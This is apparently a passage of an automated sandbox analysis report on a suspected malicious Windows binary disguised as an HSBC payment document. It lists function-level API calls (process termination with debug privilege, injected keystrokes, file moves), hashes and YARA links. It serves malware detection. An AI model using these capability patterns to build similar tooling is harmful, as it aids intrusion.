Instruction ID: 6eb08110bedbd5f6ed78393803d5af8200fd15297c7013eb677daa211f336274
Opcode Fuzzy Hash: b1988d9a0c94d3b52792b78608ae1ab9cb5dd21fb964bf9044a911f384a35794
Instruction Fuzzy Hash: 2EE1AF71604300DFCB14EF24D885B6ABBE1EF85354F18856DF9999B2A2DB38EC41CB52

Function 00784CC1 Relevance: 13.7, APIs: 9, Instructions: 170filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 0078466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00783697,?), ref: 0078468B

Part of subcall function 0078466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00783697,?), ref: 007846A4

Part of subcall function 00784A31: GetFileAttributesW.KERNEL32(?,0078370B), ref: 00784A32

lstrcmpiW.KERNEL32(?,?), ref: 00784D40
_wcscmp.LIBCMT ref: 00784D5A
MoveFileW.KERNEL32(?,?), ref: 00784D75

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
String ID:
API String ID: 793581249-0
Opcode ID: 62e713dccb7172ac835fbabb67aa8a2a48410f5c66496d2256b9777e8efd50f9
Instruction ID: 42a402f9a89551f9be4dd5391ee467a34b6f12958199d77fb95f28792939ae83
Opcode Fuzzy Hash: 62e713dccb7172ac835fbabb67aa8a2a48410f5c66496d2256b9777e8efd50f9
Instruction Fuzzy Hash: A05175B2548385DBC724EBA0D8859DFB3ECAF85310F40492EF689D3151EF78A588C766

Function 007A8645 Relevance: 13.7, APIs: 9, Instructions: 168COMMON

Download Yara Rule

APIs

InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 007A86FF

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: InvalidateRect
String ID:
API String ID: 634782764-0
Opcode ID: 94c04021cdf2939cf578fa0412db4c98def939fa86f78f5d177c5cee80adaf97
Instruction ID: 676839bd8642a3bc1720085c89a87375606b5469a627059df2f0082c26e6177a
Opcode Fuzzy Hash: 94c04021cdf2939cf578fa0412db4c98def939fa86f78f5d177c5cee80adaf97
Instruction Fuzzy Hash: 9E51A330500254FEEBA49B64DC89FA97BA5FB87320F604321F950D61A1CF7DA990CB46

Function 00722B72 Relevance: 13.7, APIs: 9, Instructions: 161windowCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 0075C2F7
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0075C319
LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 0075C331
ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 0075C34F
SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 0075C370
DestroyIcon.USER32(00000000), ref: 0075C37F
SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0075C39C
DestroyIcon.USER32(?), ref: 0075C3AB

Part of subcall function 007AA4AF: DeleteObject.GDI32(00000000), ref: 007AA4E8

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
String ID:
API String ID: 2819616528-0
Opcode ID: c0db0d8cc41d9b01ef85d31c121f87c987fe91edd7b6dd82e9f15cc5152971b7
Instruction ID: 5abb7d6cb574173d353f640d48c56d133807d10d6477e3d125cf08263cc3a994
Opcode Fuzzy Hash: c0db0d8cc41d9b01ef85d31c121f87c987fe91edd7b6dd82e9f15cc5152971b7
Instruction Fuzzy Hash: 68515970600309FFDB24DF64DC45BAA3BA5EB58311F108528F942972A1DBB8ED91DB60

Function 0077966E Relevance: 13.6, APIs: 9, Instructions: 66sleepkeyboardwindowCOMMON

Download Yara Rule

APIs

Part of subcall function 0077A82C: GetWindowThreadProcessId.USER32(?,00000000), ref: 0077A84C
Part of subcall function 0077A82C: GetCurrentThreadId.KERNEL32 ref: 0077A853
Part of subcall function 0077A82C: AttachThreadInput.USER32(00000000,?,00779683,?,00000001), ref: 0077A85A

MapVirtualKeyW.USER32(00000025,00000000), ref: 0077968E
PostMessageW.USER32(?,00000100,00000025,00000000), ref: 007796AB
Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 007796AE
MapVirtualKeyW.USER32(00000025,00000000), ref: 007796B7
PostMessageW.USER32(?,00000100,00000027,00000000), ref: 007796D5
Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 007796D8
MapVirtualKeyW.USER32(00000025,00000000), ref: 007796E1
PostMessageW.USER32(?,00000101,00000027,00000000), ref: 007796F8
Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 007796FB

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
String ID:
API String ID: 2014098862-0
Opcode ID: 0f259e9bc9c42f063f41f89fae6747e2802c842141581820f1fd2cb50cb26639
Instruction ID: 72488cd9d0e2a3e302ac17e49556b9e1783b4a61e1082deddd647cb69a360c5b
Opcode Fuzzy Hash: 0f259e9bc9c42f063f41f89fae6747e2802c842141581820f1fd2cb50cb26639
Instruction Fuzzy Hash: 7C11E571910618FEFA106FA0DC89F6A3B1DEB8D791F104425F344AB0E0C9F65C11DEA8

Function 00778921 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,0077853C,00000B00,?,?), ref: 0077892A
HeapAlloc.KERNEL32(00000000,?,0077853C,00000B00,?,?), ref: 00778931
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,0077853C,00000B00,?,?), ref: 00778946
GetCurrentProcess.KERNEL32(?,00000000,?,0077853C,00000B00,?,?), ref: 0077894E
DuplicateHandle.KERNEL32(00000000,?,0077853C,00000B00,?,?), ref: 00778951
GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,0077853C,00000B00,?,?), ref: 00778961
GetCurrentProcess.KERNEL32(0077853C,00000000,?,0077853C,00000B00,?,?), ref: 00778969
DuplicateHandle.KERNEL32(00000000,?,0077853C,00000B00,?,?), ref: 0077896C
CreateThread.KERNEL32(00000000,00000000,00778992,00000000,00000000,00000000), ref: 00778986

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
String ID:
API String ID: 1957940570-0
Opcode ID: b50a03abe7f85822c05b74d79aa88a7764e25e90931cdd5bfc26b825ff15a1bd
Instruction ID: 232ad303df1ebb487e2a3f1416ed0ff0a7283c47de5718ad951ea7daa94757fa
Opcode Fuzzy Hash: b50a03abe7f85822c05b74d79aa88a7764e25e90931cdd5bfc26b825ff15a1bd
Instruction Fuzzy Hash: 2F01A8B5240308FFE660ABA5DC4DF6B3BACEB89711F418421FA05DB1A1DA749C008A25

Function 00799B23 Relevance: 12.6, APIs: 5, Strings: 2, Instructions: 352COMMON

Download Yara Rule

Strings

NULL Pointer assignment, xrefs: 00799BA4, 00799EC8
Not an Object type, xrefs: 00799B7B

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID:
String ID: NULL Pointer assignment$Not an Object type
API String ID: 0-572801152
Opcode ID: e6f10b82593c69a810213a1b29adaadbe040ed22a0f72615cbf5af272061b4b7
Instruction ID: c80a458392a9b8791421dfa18648785d91c43e57e3027f732c94b249cfb6ba8f
Opcode Fuzzy Hash: e6f10b82593c69a810213a1b29adaadbe040ed22a0f72615cbf5af272061b4b7
Instruction Fuzzy Hash: 38C19571A002099FEF10DFA8E884BAEB7F5FF48354F14846DEA05A7281E7789D41CB60

Function 0079975D Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 242COMMON

Download Yara Rule

APIs

Part of subcall function 0077710A: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00777044,80070057,?,?,?,00777455), ref: 00777127
Part of subcall function 0077710A: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00777044,80070057,?,?), ref: 00777142
Part of subcall function 0077710A: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00777044,80070057,?,?), ref: 00777150
Part of subcall function 0077710A: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00777044,80070057,?), ref: 00777160

CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 00799806
_memset.LIBCMT ref: 00799813
_memset.LIBCMT ref: 00799956
CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 00799982
CoTaskMemFree.OLE32(?), ref: 0079998D

Strings

NULL Pointer assignment, xrefs: 007999DB

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
String ID: NULL Pointer assignment
API String ID: 1300414916-2785691316
Opcode ID: 04093938b713d95de507fff54fb785a095d30f5285e6b897e391739f15e4236b
Instruction ID: 1fabe908cb52b2dfc0a02fdb85233e26fef47208d3e322dde183174fd31013a9
Opcode Fuzzy Hash: 04093938b713d95de507fff54fb785a095d30f5285e6b897e391739f15e4236b
Instruction Fuzzy Hash: AD912671D00229EBDF10DFA4E845ADEBBB9EF09310F10815AE519A7251DB79AA44CFA0

Function 007A6D80 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 143windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 007A6E24
SendMessageW.USER32(?,00001036,00000000,?), ref: 007A6E38
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 007A6E52
_wcscat.LIBCMT ref: 007A6EAD
SendMessageW.USER32(?,00001057,00000000,?), ref: 007A6EC4
SendMessageW.USER32(?,00001061,?,0000000F), ref: 007A6EF2

Strings

SysListView32, xrefs: 007A6DF6

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: MessageSend$Window_wcscat
String ID: SysListView32
API String ID: 307300125-78025650
Opcode ID: 24877963418c1978908cdddfd727718d32a7e6dbffef88e508f60e113728b7f0
Instruction ID: 2a92d9b2fc50befb1e69c81a0b8568acfc2d42113d32257bb3d4dc5d087228c1
Opcode Fuzzy Hash: 24877963418c1978908cdddfd727718d32a7e6dbffef88e508f60e113728b7f0
Instruction Fuzzy Hash: 0B41A171A00348EFDF219FA4CC85BEA77A8EF49350F14452AF644E7291D6799D848B60

Function 0079E933 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136COMMON

Download Yara Rule

APIs

Part of subcall function 00783C55: CreateToolhelp32Snapshot.KERNEL32 ref: 00783C7A
Part of subcall function 00783C55: Process32FirstW.KERNEL32(00000000,?), ref: 00783C88
Part of subcall function 00783C55: CloseHandle.KERNEL32(00000000), ref: 00783D52

OpenProcess.KERNEL32(00000001,00000000,?), ref: 0079E9A4
GetLastError.KERNEL32 ref: 0079E9B7
OpenProcess.KERNEL32(00000001,00000000,?), ref: 0079E9E6
TerminateProcess.KERNEL32(00000000,00000000), ref: 0079EA63
GetLastError.KERNEL32(00000000), ref: 0079EA6E
CloseHandle.KERNEL32(00000000), ref: 0079EAA3

Strings

SeDebugPrivilege, xrefs: 0079E9C2

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
String ID: SeDebugPrivilege
API String ID: 2533919879-2896544425
Opcode ID: dd95f0274f24ff49363e81ab44b9eab365714f38d245d5272f5e897d0960376a
Instruction ID: 2f7defb2eaa73b82a301fc63ef4a97631d133a510c3c629fcb918e07954a43f2
Opcode Fuzzy Hash: dd95f0274f24ff49363e81ab44b9eab365714f38d245d5272f5e897d0960376a
Instruction Fuzzy Hash: 3A419A71200200DFDF14EF64DCA9F6EBBA5AF81354F08C458F9469B2D2CB78A804CB96

Function 00782F94 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 82windowCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000000,00007F03), ref: 00783033

Strings

blank, xrefs: 00782FB5
warning, xrefs: 0078301C
info, xrefs: 00782FD4
question, xrefs: 00782FEC
stop, xrefs: 00783004

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: IconLoad
String ID: blank$info$question$stop$warning
API String ID: 2457776203-404129466
Opcode ID: e6e722c78576c56a1a89b8c36a9b9649e71613e138bb107ef6e86edc9e40ea86
Instruction ID: e279c763c35f6ece7d4a669c7bf93b4c8294e1aee640da20215f98322da9331f
Opcode Fuzzy Hash: e6e722c78576c56a1a89b8c36a9b9649e71613e138bb107ef6e86edc9e40ea86
Instruction Fuzzy Hash: 9D112B31388346BED714AB58DC46C6B77ACDF15720B50002BF900E6282DB7C9F5157A5

Function 007842F8 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00784312
LoadStringW.USER32(00000000), ref: 00784319
GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0078432F
LoadStringW.USER32(00000000), ref: 00784336
_wprintf.LIBCMT ref: 0078435C
MessageBoxW.USER32(00000000,?,?,00011010), ref: 0078437A

Strings

%s (%d) : ==> %s: %s %s, xrefs: 00784357

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: HandleLoadModuleString$Message_wprintf
String ID: %s (%d) : ==> %s: %s %s
API String ID: 3648134473-3128320259
Opcode ID: 2530e9f3718a1a6895e1c4e6986ea06bc249e674a4697857b1695913b05def2b
Instruction ID: ab97a246ef3e8ac7f04b378d6d0fcba70c5dad11f782dab661dae41d0a4edf90
Opcode Fuzzy Hash: 2530e9f3718a1a6895e1c4e6986ea06bc249e674a4697857b1695913b05def2b
Instruction Fuzzy Hash: 850162F294020CBFE751A7E0DD89EE7776CEB49300F0045A1F749E2051EA785E854B75

Function 007AD43E Relevance: 12.3, APIs: 8, Instructions: 257windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00722612: GetWindowLongW.USER32(?,000000EB), ref: 00722623

GetSystemMetrics.USER32(0000000F), ref: 007AD47C
GetSystemMetrics.USER32(0000000F), ref: 007AD49C
MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 007AD6D7
SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 007AD6F5
SendMessageW.USER32(00000003,00000469,?,00000000), ref: 007AD716
ShowWindow.USER32(00000003,00000000), ref: 007AD735
InvalidateRect.USER32(?,00000000,00000001), ref: 007AD75A
DefDlgProcW.USER32(?,00000005,?,?), ref: 007AD77D

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
String ID:
API String ID: 1211466189-0
Opcode ID: 7fcf51f075a8b1ffeb4a6e15928e73b193d3157a81c9e53e7666e95cf80d4a85
Instruction ID: 05f4da3d6327001c951cc9ec885558fd32ca395b7c48c21167afb0965dbe650e
Opcode Fuzzy Hash: 7fcf51f075a8b1ffeb4a6e15928e73b193d3157a81c9e53e7666e95cf80d4a85
Instruction Fuzzy Hash: DCB19C71500215EBDF28CF68C9C97AD7BB1BF89701F08C269EC4A9B695D738AD50CB50

Function 00722A5B Relevance: 12.1, APIs: 8, Instructions: 129COMMON

Download Yara Rule

APIs

ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0075C1C7,00000004,00000000,00000000,00000000), ref: 00722ACF
ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,0075C1C7,00000004,00000000,00000000,00000000,000000FF), ref: 00722B17
ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,0075C1C7,00000004,00000000,00000000,00000000), ref: 0075C21A
ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0075C1C7,00000004,00000000,00000000,00000000), ref: 0075C286

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: ShowWindow
String ID:
API String ID: 1268545403-0
Opcode ID: 5fd7eab34080901f5a75c75dfb667356506e9c66bd016af20ee513e44ccbd2a5
Instruction ID: 87c7e7da1754d5402db779113b8117c2e5af4ee3a94fbeb1713d903604911fec
Opcode Fuzzy Hash: 5fd7eab34080901f5a75c75dfb667356506e9c66bd016af20ee513e44ccbd2a5
Instruction Fuzzy Hash: C241FB306047D0FEC7368B68AC8CBAA7BE2BB86310F54C42DE94746962C67DD887D710

Function 007870C6 Relevance: 12.1, APIs: 8, Instructions: 101fileCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,000001F5), ref: 007870DD

Part of subcall function 00740DB6: std::exception::exception.LIBCMT ref: 00740DEC
Part of subcall function 00740DB6: __CxxThrowException@8.LIBCMT ref: 00740E01

ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00787114
EnterCriticalSection.KERNEL32(?), ref: 00787130
_memmove.LIBCMT ref: 0078717E
_memmove.LIBCMT ref: 0078719B
LeaveCriticalSection.KERNEL32(?), ref: 007871AA
ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 007871BF
InterlockedExchange.KERNEL32(?,000001F6), ref: 007871DE

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
String ID:
API String ID: 256516436-0
Opcode ID: b5ecceac75cc57e6b58f368b51a3aab3217e1999645204a8029f6491e7d93c6c
Instruction ID: 8495bdd07388b48ba0881abc69a11cab502512491b0e7de6926611e39a09077c
Opcode Fuzzy Hash: b5ecceac75cc57e6b58f368b51a3aab3217e1999645204a8029f6491e7d93c6c
Instruction Fuzzy Hash: D9317031D00205EBCB10EFA4DC89AAEB778FF85710F1481B5E904AB246DB38DE14CBA4

Function 007A61D3 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 007A61EB
GetDC.USER32(00000000), ref: 007A61F3
GetDeviceCaps.GDI32(00000000,0000005A), ref: 007A61FE
ReleaseDC.USER32(00000000,00000000), ref: 007A620A
CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 007A6246
SendMessageW.USER32(?,00000030,00000000,00000001), ref: 007A6257
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,007A902A,?,?,000000FF,00000000,?,000000FF,?), ref: 007A6291
SendMessageW.USER32(?,00000142,00000000,00000000), ref: 007A62B1

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
String ID:
API String ID: 3864802216-0
Opcode ID: 918610b3deaa1600c4527eacbfcfcfaed66ca2dc37dce203f1fa212414b3edbe
